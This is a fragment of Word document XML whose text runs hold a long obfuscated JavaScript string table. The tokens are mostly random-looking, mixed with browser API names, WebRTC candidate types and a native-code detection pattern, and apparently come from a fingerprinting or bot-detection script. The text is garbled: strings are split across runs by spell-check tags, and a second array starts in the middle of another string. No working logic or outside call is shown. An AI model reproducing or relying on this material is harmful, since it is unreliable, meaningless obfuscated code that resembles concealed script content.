      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", "0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "call", "OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", "J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew", "px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", "oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg", "7huIVudaQe8kKrvbjCgbg6IhZVVq", "jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM", "E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cgs", "complete", "zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w", "rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ", "U8hWjiKAgQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uhiUJg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MH-mP81CVJk", "2rIU0WTI3iOZvyF-S5jKfiWi4djhW_x4-xJxI_uVaNULQame-I3Hi0yBfrsaYgFm285litcK32Ig-QhBj06ms177lfgyY2WvD0R8VMNncqTXUJL-Vd_xOs6zMFC2hdyeaL-VPdOe_LpMRhOi73U5r6wJZwVYQDNKW-j2wIqJ-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5B6cX2LhIdoR8QkDZvAlUN_wNtTjpKens9tNajw_dFFe3gUMyY_1HvjrFWSYT0g8bk_ZFdw5tS6eZwnwwcSoyur4LTN_Us7DAuSXKH_fb8oNm2cNrZHChdDbcnOqCR-H7zPK0v41BFq4f3fTNc-gBFEcmUDUH0Nw3w8RJ8wVVnD5aicumkgkIcT8_0KUiMMqnpYA5XVV_xpiuTkYLcfOhNGfaxda_f5Oe2XsvzyraMqYfd4YWM8ZIJPWX8bT5Qj-o86eFuKyT1po1K_wQydaWwJAlZ15DzxTs_up35x5BSVIBLNSwVtA0X-soOvyMxyGd0lUr1saX_zDTPe5M69GkMDHYrd8p3kK5B80c24B2KxwWRGESTiex6redfeKWGn4YslXgsWuw6WpEJIDgSrV7nu2qi3LOnSouDBv5y0GKoQM1rEMTyOyg6CFMkFUBbRxvH&gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k","NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw","WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1NkgnVOGVoblZhTvXbJBUSc3wFgjzvDNw_K67eBQ-H1H8qwmY2zfa3rdkPD4glhfd1g3wvUxrnFxeBU44UVcVNzY3OvAJBb4aKw5BAh_Tj_JA8xcZ-PtPoctuB7JE6z8QLbjC10Sls0L51lmgIa8PrHg8_xJTnA7nqgPKa_0MJoUq3uN6MHHEaeMvWSS2RzNv0gvPHEJKbXiuRCeSf9uXKnH8hwE136DNk1pmhE0dfxQOd9ERe9vj61FtNXeGUTXuB-Mlb7cUeeFgBrEoAHLOxuiKtrsvUqSDIUZ8ErLDgErFHbc0CnqmpCQyCycFNU2mPpiAY52bfaFDsBaYLy7UR1DRAXI4p5ar-8dBRVHvMDE1N9aS2kRBGHbW69u9ubvERwgVsEYiVFsxDqa3f7UMrv_t3--fHYAIyFy_R5Tz94TERj2nJCpatV1qrfYYk9tu0Wh-hBekQryBSWXGYUvx_DhIHkeVgsvlLoq9jGPC-_RYc1KlGLbQdS65vpIIDbM66I_C08tw-Y91GotdlP_ssSlEl0FujZy94hBKacDPu53LajqoDlgWOhKpzv1bkZe0sNOLMNoEEuB7UzHOOzyKslJNLpxTx3yqy79HDsE7A9WLAOovLAMON_L4FKnOFX2l_9N2ajn-D64TQylqlcrbG6mTg_UCrdHx_nKAsVm3Qzy8YjnOMQGRCixVlMtMhvXOVHtu-fvMGLX41NC4S09DeB5oCh_urcx9KR8KSRIFhaCTtJn-oTQlutcxKH5Ao32Tzha1XX1wPE5eiQ6-LrVZgEQiUcUKHZJ4dgfyrBHYCsorIb_PX6QsrW3R9vK0PmkRZtuoz__xsa5z-Zc1sVFdm3S_iJq7DWx66VnoqhDMfqK4rhzVe7r9pmbF9Jugj2ya_YP-v7_0r-9cSLbJRE28BBDvqZ5rnJpeGjz-WqDQ__nmeAYjcZcN40WxI6hU81mbBpXA6RvFEqgIR1i0l_Hmewkx3ABrE9lJ95U5__rthBQc</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>S5fsIDTecK9oixzyHTHeQ-lN-c3CpwZLtH16r_0hbootQX038z4OU1QipYoxHDJ9Iqzis0pnoadVoME9ap6U0aeFSCw1gkIFcqkTcyuPbDCKaqx7Yr1Bahgi87BuofsBHg6SPb57i23_vNf7z77SDuVyCRKo5lbgOoY_R2eaI3WiUYhAobVjNTwcp2_pBf2bY74Kg-HSNRG46uGR4iby_J10QDg1tOWQtTvhcPjCLmr3Ucb-437Z9-tQ8BTnm4HYuQojk_i1mvsmahuTJCK6cbZKjxOitmuuG3auaKpE2PbAFaQbymWEj0TH4vEuqyNYuy5yb5oMdG5l-FztQEVI7sWKsZILXJu7uXLsvUO18DiJhBoMvdLNXQKlMfizJb_QG2EEspMpEIVy8GShymsVORDmq33NOokDIqwYxsXg6aZtknsFWvTOv0paZ-BD70j17KFIiTp552_Raos7BFHcgsY_v4D46sA8CtZo0_lglJWMlDrRZkVPlfmcorkhRHSZmewXQMdwIhO7B2nmvcHmAEUQz8YDXDJ3ZpUuj9oEtMb_BNCUc94Z4RAdCAMT7QUIGisS0CB_dInj9clJkJeaB8WvXaEBfPT-7pi8XP6rUXA5AxUMmrGG7TBWrV5UlqG5eEgEv3lfo3uAlFQ7HI8dNS2xr4nN_LsPJZmv0JlLPqXdV3fhzk7GaCO0kzfUbno3beo8DwOEhCblIhquyaRVWwwGupay_LvafHcDpgWOqJsFxHPFYYVbxtI9z8q78yfovXzi7IH_RV5WozfdDpF6J3JknwXJuZSmv7IAfq6vPulZt7gJAWwoBeW_U9AKYlDyuOijtNsxAXoCRjx8PK_DNvEQQggDFmY3Fsw6OpiJ7-stG0bf17enkIZPt3G2Kzxnv9NqRvLmJtxkFXhAdI5Oht2s24SQmCVYnezypJ0LJSEZ91FII6ibw3vznavP8xuR4q8nnoop-RURn6FqExbAGJFQxtNGkgEiLzqrmJii-URl-H6JuwKwBeABH4VQCEmQQRbDVsN738CYIJXZhpsV5EigmxpUYOu1RRMJBq3BMsCFbzV69FyLrgBxuR0ycO-lsA4rEr1GVkZLV7DpkCPdpP24LjI29fgcW4QpgPteAkAOEHrLtiA5Bj4c8dAH6177a30aUjHi1zWaNy15TxzMx9uXcXy7UAwnhdLohkVdOP1y8IcPnjNKCF4ulSoo6VSUipIUf8iVcOI_NmlZD_-46MjjkNEriKkzG1jRfr8Clh_86YgZ7kOSgZEvqmbTfokTwRAmHY4thzc-BbIyK4qnHLxUpNDTgJ-HLIyRZlODonWi2ncL4DwB04rn-KFonKicToH-Zl_1_DwaMl6-YXHZ0Uqzxk-Q15co-N4VpOTK0IuAyMKmDVha7Y71V9vTf0x-ILfqCEO36xFdLaNJ_FA7QluR3NLcKuvbwP0ljy-fc4YpJCjEKFlRbyguXR1YyGbUnLCOHjxHMwKUK8Bf0J774lvJ5JiDn8l-XHePo9YRaraqtH9zI", "Z8R7oAyQpwu-", "bFzjFrYVO9lTC8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GmvnTZkAK_dPCNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-tg8s1nt_BKS3FYSLO-mEA_R66KiPp8QyXVOL4c", "aTPjYYc5GJMBU9OKsw", "oyTtD5oxM8B1MY22jG4", "e0buMYEyB_pcRo7y", "TBKaOZ8yW_ltHqfxxBBpkg", "NcwHlnfu-w3_", "nJMEmmPAsC2suCN_DJbTZg", "F2LmQp4UfMAFEIez-gB-yQ", "VPUouyHp6n_evhwyHK_iQA", "File", "global", "1WOfOeBzPOEdWMPIxg", "pXH-J681G8Ib", "yRv5T7MGC9w7bp62", "closed", "f5U4kDGL8UbPugIaXLrMKgM", "xxTnF5ghPs4d", "3MQymkTO4wL731Bqf4_rVzTFwa7sHIgC5nwCIcLLBcBPB9fi-dPRvRjNLPURWXx8-w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LuU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "nbs-9grOoAXlhg", "oWLRV7w1B_5KYviS", "iIJt8ne4oQ", "-SeRL_1qRI8", "dhjdQLYbFao3d_W2mwNX5ec_UDYanCOv", "b4sv_VvoihqN6BlBd5imSByuwO3yYuUQxW0", "4_ca6VGgjw", "m3GWLot5Yw", "u071ZK0_GIRy", "stringify", "r-Q", "_1GtQ85oFQ", "Zz3ODugvDeomc_C3_RpA8K0DMktggmeqZeTjtBBHghnGg05jC0NXAJ8G-yjXtA", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"b5Bf5C2z5nOuvms6EfeXJHS1lc-dPrxnm0AoGfWMMeA4fJndj_yvnGqEVJ51Ol9O1YhI8PoE1GUQxXVk1UyghDOfsg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SxePAfwLacANNaE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Promise", "aGHiZoY5", "X-JLwCmI5Xr0vDg1SNWCP3T_jIiXErwqqVJ0CIzScOxbVLiT9_GZmg_0L-ZBLEow3I9Mn54JxA0sthhE0Rn_-QrWgeshZye9SQMBEKpzFKXUUw", "Xl3xGPMHLb85LbvDkw", "Event", "-0nAK6otDoFHJfnQ2RNU4IY", "9uI", "z8ciuF3n7y75glxHPrvyYjid6_L7c91Jrw", "maIt21jK0GqB1A", "_rVr4xS2jGmq71VzWa_HUSc", "YEKMQ-V_FZ1XQ9HQvg8-7No7WA", "OyjCU9MaJc0xLqP22RdwgrYwMEhM2mD4I4uj2Wtg6EjqqwcGYFk8b6Ir-z-M66z6TyCVJWiIOezhbqmJPg", "R5Vtxh2Ox0bT", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MowAhXLKqiA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "t8lHsBejmnPb", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YXTtXg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "g6I", "i_191RyUqk_AlkNsao_pRA-MxabmX8YZqSRYaI_wTNNJEtfg6t3bvU72ZfEZUz8ytaAph4Zi4TtDkn9-", "E3qPBPpZVbl_I-XR3wpS5aUiSxBE2HKmLJCG2G9YvmDQyXJ7MUFaBYZ7tniJy5HhHUSqUVKXF8LqLZWdN9UxKZ0JeCbjoaok0YeC22Gs22JD21Fr3GUj5XMqkYp7SBlFtEoJpRsCbw7RhoUSfuyNCnLg9p7KlvyDs2hVXVoRNEOhp6Jfemm9xUS_kkgRE9fnAE7JVVYSGALdzyEmfQPyuLnc9regY9QOPIUa_a-qYXHTuOm-UhN24VurAMLUfZwGcTlLd83n-4QBzzNm3Db6trclnjmQ3tretl95EajwlD8H35lME4-pCiBT3i35UIu8pss", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GFipKNlrFIRvEQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
